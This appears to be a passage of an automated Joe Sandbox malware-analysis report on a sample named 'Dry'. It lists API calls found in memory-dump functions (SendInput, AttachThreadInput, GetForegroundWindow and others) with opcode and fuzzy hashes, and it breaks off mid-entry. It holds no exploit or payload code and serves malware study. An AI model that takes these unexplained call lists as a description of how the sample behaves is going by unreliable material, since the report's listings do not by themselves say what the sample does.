                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B4B68D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e1236d2f1e9fe3c9a45df7cd8ec5397308867926563b9b99822b8ae1f614e7ef
                                                                                                                                                                                                                                                                                    • Instruction ID: a59b7f56d2e03d2f6b62f08ef8beb75ea9679631f37ed38e41133e1198e8bbd1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1236d2f1e9fe3c9a45df7cd8ec5397308867926563b9b99822b8ae1f614e7ef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49314B309406186EFF348F288805FFAFBF6EF95310F0542AAE685921D1C774CB82AB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00B780D4
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B7814A
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00B7815A
                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00B781C6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5fb87d4dde11d80f3ff0ec0a82414aec02bc43aaed8e4647050b088f621f76e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 5265c54671b17cbca9f453390b87290264cb0dc49039392c2470c591fa6065b8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fb87d4dde11d80f3ff0ec0a82414aec02bc43aaed8e4647050b088f621f76e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD419E30A40215DFCB11CF59C888BA9B7F5FF49314F5581E8E96CAB6A1CB71E842CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B72187
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
                                                                                                                                                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00B7219B
                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00B721E8
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B721EE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e9d496579c6f5d4d5d819de0c7915a6da67be7538ee7d571a191cd3c9b58bec9
                                                                                                                                                                                                                                                                                    • Instruction ID: f5806e509bceacd9c44b2aae86cd3fe1450a71e7b642d62593074e58c5aaed16
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9d496579c6f5d4d5d819de0c7915a6da67be7538ee7d571a191cd3c9b58bec9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0315271D00249AFCB04DFAAC981DAEB7F8EF48304B5084AAE419E7251DB75DE45CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4E8E2
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4E8F9
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4E924
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B4E92F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42b3b802b7e95853f74163c4fd9764da72f6b6ae32dcaba8e8ebb02408d0d20b
                                                                                                                                                                                                                                                                                    • Instruction ID: d1ab322f60293a6ac6fb158c93cdad795dd3deaf6223d359cc87e4d63b4b0a82
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42b3b802b7e95853f74163c4fd9764da72f6b6ae32dcaba8e8ebb02408d0d20b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3121A172900215AFDB10AFA8D982BAEBBF8FF45350F1440A5E914BB2C1D7709E41CBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B79A5D
                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B79A72
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B79ABA
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00B79AF0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5198f9e638213d77cc2ac85f5f5b74b728d05fef5497059b97011baec84fe4b4
                                                                                                                                                                                                                                                                                    • Instruction ID: 804bdf89b45a4569819d3be67008b5c538e6940b270d39ea3dd2c6f2700c0e55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5198f9e638213d77cc2ac85f5f5b74b728d05fef5497059b97011baec84fe4b4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21BF31601018AFCF258F54C888EFA7BF9FF09750F4081A5F9198B1A1D7709950EB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00B7DC30), ref: 00B4DBA6
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B4DBB5
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4DBC4
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B7DC30), ref: 00B4DC21
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ec83f9280d74538acf10b0155ded2831d92bc494c3974a17a82b83eea390f0e8
                                                                                                                                                                                                                                                                                    • Instruction ID: 82bebf97851161358a90f8cda21d2bfb8f8ce6bb95d521fceccb4e44335ee2eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec83f9280d74538acf10b0155ded2831d92bc494c3974a17a82b83eea390f0e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3521B2305083019F8700DF28C9C096BB7F8EE5A364F104A5DF4A9C72A2DB70DA46DB93
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00B732A6
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B732C0
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B732CE
                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B732DC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b697c0f648f08d678c2ca6baf00b37c34dc9c0678d73d11a97b96439cd5bdabe
                                                                                                                                                                                                                                                                                    • Instruction ID: 682cad6aca71ae4c4fcd4534d95e93dab06ac622d9b167d062fa068c4dede84a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b697c0f648f08d678c2ca6baf00b37c34dc9c0678d73d11a97b96439cd5bdabe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0621C431204111AFD7149B24C845FAA7BE5EF81724F24C298F83A8B2D2CB71EE81C7D0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?), ref: 00B496F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrcpyW.KERNEL32(00000000,?,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B49719
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrcmpiW.KERNEL32(00000000,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?), ref: 00B4974A
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B4828A
                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482B0
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482EB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                    • Opcode ID: 442ed80ba28c0caa79805141aaf72ca8e74d80ee8785b258a3f794943a92e4ed
                                                                                                                                                                                                                                                                                    • Instruction ID: d86155f2c07648f23a180c73a64d18770ec34fdb435f0643ea982f984cb7aedc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 442ed80ba28c0caa79805141aaf72ca8e74d80ee8785b258a3f794943a92e4ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11263A200342ABCB14AF38C844E7E77F9FF45750B50406AF906C72A0EF719A01E794
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B7615A
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B7616C
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B76177
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B762B5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1405b26149bd70bb52a86f115e7384590fe2c5ca2c5e835d92230f772a076019
                                                                                                                                                                                                                                                                                    • Instruction ID: 300d2688f3fb5003d54dbd7c0c3186a0072d61258dd9c7314d7a5f1407b677f3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1405b26149bd70bb52a86f115e7384590fe2c5ca2c5e835d92230f772a076019
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3511847550061896DB20DF648CC4EEF7BFCEF15354B1081AAFA2DE6081EBB0C944CB61
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 87e1c30e7668e76f1763521c01317e0cc8d9eda29b98ccb56b75c11bc28f16b4
                                                                                                                                                                                                                                                                                    • Instruction ID: 686dbfdc827e34e985129e72a1bd7104c65117ba74c3d23e7878295a949ee19e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87e1c30e7668e76f1763521c01317e0cc8d9eda29b98ccb56b75c11bc28f16b4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37018FB22092167EE6212778ACC5FA7679DDF853B8BB007B5B521A12D1DE608DE08160
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B42394
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423D7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 559727f9aa03d5c13bf4fce853d1706b5b5e57359a389609e5bd1f038d9790a6
                                                                                                                                                                                                                                                                                    • Instruction ID: e5640df32d385ed449f9b2312047366d55591044d4cd7d96d91885437514331a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 559727f9aa03d5c13bf4fce853d1706b5b5e57359a389609e5bd1f038d9790a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4911F73A900218FFEB119FA5CD85F9DBBB8EB08750F600091EA01B7290D6716F50EB98
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00AE1AF4
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B231F9
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B23203
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B2320E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6fd1be02407e830f53880d1e2c49638b314b43e7d3a62966d60596e9ae05f99f
                                                                                                                                                                                                                                                                                    • Instruction ID: ef81bbf251365b99c69bed737665bdf597e03f7f93724d5b48e4ba016c28ee6a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fd1be02407e830f53880d1e2c49638b314b43e7d3a62966d60596e9ae05f99f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30114C32A01169EBDB10DFA4D946DFE77B8FF05391F100462E916E3140CB75BA91CBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B4EB14
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00B4EB47
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B4EB5D
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B4EB64
                                                                                                                                                                                                                                                                                    Memory Dump Source
